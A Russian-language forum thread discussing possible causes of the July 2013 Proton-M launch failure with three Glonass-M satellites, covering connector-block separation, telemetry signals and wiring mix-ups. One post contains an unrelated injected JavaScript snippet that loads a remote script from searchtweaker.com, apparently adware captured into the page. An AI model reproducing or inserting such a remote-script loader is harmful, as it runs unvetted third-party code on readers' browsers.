Три Глонасса-М - Протон-М/ДМ-03 - Байконур 81/24 - 02.07.2013 06:38:22 ЛМВ

Автор Salo, 23.11.2011 11:07:53

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

dmdimon

Цитироватьzur пишет:
Это копипаст из резюме? Предыдущие наивные вопросы позволяют усомниться в реальности таких достижений...
Я не задал в этой теме ни одного вопроса. И работу я давно не ищу, мне ее предлагают.
push the human race forward

Feol

#1361
ЦитироватьАниКей пишет:
ЦитироватьВпрочем, официально Роскосмос это предположение пока не комментирует. Поповкин подчеркнул, что пока никакой версии не отдается предпочтения. Одна группа рассматривает комплекс этих факторов и то влияние, которое они могли оказать на возможную причину. "Сейчас должна экспериментальная обработка быть этих вариантов, и мы должны прийти к тому, как это произошло, чтобы план мероприятий выработать ", - сказал он.
Это напоминает 3-ю аварию Н-1  ;)  ... Глобальные исследования закрутки струй после ракеры, воздуха между баками и обшивкой и т. п. на фоне различий в режиме работы ДУ 1-ой ступени, чтобы объяснить, почему ракету закрутило по крену сразу после старта, но не закручивало при 1-ом запуске.. Вместо признания того, что знак по крену перепутали. Если по той аналогии пойдет, то и записанная телеметрия должна куда-то навсегда загадочно исчезнуть  :oops:
Всем пользователям нравится это сообщение.

Руслан

ЦитироватьВован пишет:
Она и не поднималась, просто прошел сигнал КОНТАКТ ПОДЪЕМА из-за отвалившегося раньше времени блока разъемов
Простым языком - в телеметрии неверные данные?

Вован

ЦитироватьРуслан пишет:
ЦитироватьВован пишет:
Она и не поднималась, просто прошел сигнал КОНТАКТ ПОДЪЕМА из-за отвалившегося раньше времени блока разъемов
Простым языком - в телеметрии неверные данные?
Телеметрия следит за сигналом КП. Иначе момент подъема не определить. По видео можно, но десятые доли секунды вряд ли увидим
Байконур надолго - навсегда

Stalky

ЦитироватьFeol пишет:

 Если по той аналогии пойдет, то и записанная телеметрия должна куда-то навсегда загадочно исчезнуть   :oops:
Как учили:  пункт 1 - в случае аварии на СК  : быстро переместить всю рабочую и техдокументацию в очаг пожара.
Классная у вас трава, ребята.

Serg_nn

#1365
По моему мнению подводя все выше прочитанное может было так:
[LIST=1]
[/li][li]раньше времени отваливается блок разъемов (по какой причине это уже другое дело)
[/li][li]ракета видит отрыв и разрешает работу системы безопасности носителя
[/li][li]система безопасности видит не нормальное давление в КС (тяга то еще не добралась) и врубает уход на форсаже.
[/li][li]вполне возможно махая двигателями еще в стартовом столе повреждает себе что нибудь
[/li][li]далее то что мы видели
[/li][/LIST]
все это только мои домыслы

m-s Gelezniak

ЦитироватьSteel2 пишет:
ЦитироватьKotofan пишет:
имхо наказать всех денежно в равной мере при неудаче
То есть если какой-то мудак на сборке перепутал провода в разъеме так, что это не выявляется при штатном тестировании (нечаянно), и из-за этого произошла авария - то всех остальных тоже депремировать? Отличная стратегия поощрения, я считаю.
Возможно о рзъёмaх я узнaю что то новое... .
http://ifotki.info/14/34b06296f5509e5c514ba0cdd478b0134e197a155685542.jpg.html
Шли бы Вы все на Марс, что ли...

Руслан

#1367
ЦитироватьВован пишет:
Телеметрия следит за сигналом КП. Иначе момент подъема не определить. По видео можно, но десятые доли секунды вряд ли увидим

Если измереник КП идет только по одному источнику, то 0,4 вполне чисто механическая составляющая.

ЦитироватьВован пишет:Как учили: пункт 1 - в случае аварии на СК : быстро переместить всю рабочую и техдокументацию в очаг пожара.
Ага  :D  В результате падения РН никто не пострадал. Падение привело к пожару, в котором полностью сгорели вся документация и инкассаторская машина с 1млрд рублей  :D  



Всё таки ранний старт бред, но в народе почему то витает ещё более бредовая - скрытие хищений  :D

(f unction(){try{var header=docu ment.getElementsByTagName("HEAD")[0];var script=docu ment.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.on readystatechange=f unction(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.on load=null;script.on readystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

zur

Цитироватьdmdimon пишет:
 а почему вообще МОЖНО перепутать провода? Почему они дотягиваются куда попало, не имеют явной маркировки, почему разьем подходит не туда или вставляется перевернутым?
Ну вот эти вопросы, например. Разве не наивные? :-)

Sarge

Цитироватьzur пишет:
Ну вот эти вопросы, например. Разве не наивные? :-)
По-моему,по ходу обсуждения путают отдельные провода и целые разъемы.

m-s Gelezniak

ЦитироватьSarge пишет:
Цитироватьzur пишет:
Ну вот эти вопросы, например. Разве не наивные?
По-моему,по ходу обсуждения путают отдельные провода и целые разъемы.
Одно без другого не бывaет.
Плюс ответ по поводу мaркеровки. Герметичности  итд.
Шли бы Вы все на Марс, что ли...

PIN

Случаи, когда основная версия - ошибки в проводке:
TDRS-9: один из клапанов (от бака с гелием) открыть не удалось
NOAA 13: КЗ монтажным винтом, полная потеря аппарата
TOMS-EP: перепутаны провода от датчика Солнца. Проблема решена патчем в бортовом ПО
TOMS-EP: перепутаны провода к магнитной катушке системы ориантации. Проблема решена патчем в бортовом ПО

dmdimon

#1372
Цитироватьzur пишет:
Цитироватьdmdimon пишет:
 а почему вообще МОЖНО перепутать провода? Почему они дотягиваются куда попало, не имеют явной маркировки, почему разьем подходит не туда или вставляется перевернутым?
Ну вот эти вопросы, например. Разве не наивные? :-)
риторический вопрос — это вопрос, ответ на который не требуется или не ожидается в силу его крайней очевидности. В любом случае вопросительное высказывание подразумевает вполне определённый, всем известный ответ, так что риторический вопрос, фактически, представляет собой утверждение, высказанное в вопросительной форме. 
http://ru.wikipedia.org/wiki/Риторический_вопрос
push the human race forward

Sarge

Цитироватьm-s Gelezniak пишет:
Одно без другого не бывaет.
Плюс ответ по поводу мaркеровки. Герметичности  итд.
Хмм.. Одно дело - перепутать провода при изготовлении (видели же когда-нибудь, как в цехе разъемы "набирают"?), хотя я и в это не верю, да и прозванивать их должны все равно, другое - подстыковать разъем с маркировкой, условно, "N" к разъему "M". А уж перевернутым тот же 2РМ вставить... тут надо быть даже не дураком, а очень сильным дураком, и то вряд ли получится ))
Герметичность тут при чем?

m-s Gelezniak

ЦитироватьSOE пишет:
Случаи, когда основная версия - ошибки в проводке:
TDRS-9: один из клапанов (от бака с гелием) открыть не удалось
NOAA 13: КЗ монтажным винтом, полная потеря аппарата
TOMS-EP: перепутаны провода от датчика Солнца. Проблема решена патчем в бортовом ПО
TOMS-EP: перепутаны провода к магнитной катушке системы ориантации. Проблема решена патчем в бортовом ПО
Это 99% ошибки тестировaния и рaзрaботчиков. Методики проверок нa их совести.
Отдельно стоит отвaлившийся припой.Но это отдельный рaзговор.
Шли бы Вы все на Марс, что ли...

m-s Gelezniak

Сaмое погaное перепут рaзрядов  в шине. Но тaк же см выше. 
Шли бы Вы все на Марс, что ли...

PIN

ЦитироватьSarge пишет:
Одно дело - перепутать провода при изготовлении (видели же когда-нибудь, как в
цехе разъемы "набирают"?), хотя я и в это не верю
Я лично видел примерно в 2000 году бортовой транспондер с перепутанными разъемами RX и TX. Именно "при изготовлении".

мастер_лукьянов

ЦитироватьSerg_nn пишет:
По моему мнению подводя все выше прочитанное может было так:
1.раньше времени отваливается блок разъемов (по какой причине это уже другое дело)
2.ракета видит отрыв и разрешает работу системы безопасности носителя
3.система безопасности видит не нормальное давление в КС (тяга то еще не добралась) и врубает уход на форсаже.
4.вполне возможно махая двигателями еще в стартовом столе повреждает себе что нибудь
5.далее то что мы видели
 
все это только мои домыслы
по п.3 нужно уточнить. Fagot выссказывал правильную мысль, что Протон ВСЕГДА стартует при давлении в КС меньше номинального. Допустим масса Протона 702т, тогда он оторвется от стола когда тяга достигнет 702т + 1 кг. Это соответствует тяге одного двигателя 117 т а не номинальные 162

Sarge

ЦитироватьSOE пишет:
Я лично видел примерно в 2000 году бортовой транспондер с перепутанными разъемами RX и TX. Именно "при изготовлении".
Я писал про перепутывание распайки проводов внутри разъема. Поскольку RX и TX мне ни о чем не говорят, уточню: кабель, от которого идут 2 головы с такими маркировками?

m-s Gelezniak

ЦитироватьSarge пишет:
Цитироватьm-s Gelezniak пишет:
Одно без другого не бывaет.
Плюс ответ по поводу мaркеровки. Герметичности итд.
Хмм.. Одно дело - перепутать провода при изготовлении (видели же когда-нибудь, как в цехе разъемы "набирают"?), хотя я и в это не верю, да и прозванивать их должны все равно, другое - подстыковать разъем с маркировкой, условно, "N" к разъему "M". А уж перевернутым тот же 2РМ вставить... тут надо быть даже не дураком, а очень сильным дураком, и то вряд ли получится ))
Герметичность тут при чем?
И видел и сaм пaял.
К серийному оборудовaнию пологaются методики и стенды проверок. Которые проверяют и логику и обрыв - зaмыкaние и утечки . Плюс ещё и сaмотестировние. Вот поэтому это и стОит. A не потому что кто то хочет Мaйбaх. 
Шли бы Вы все на Марс, что ли...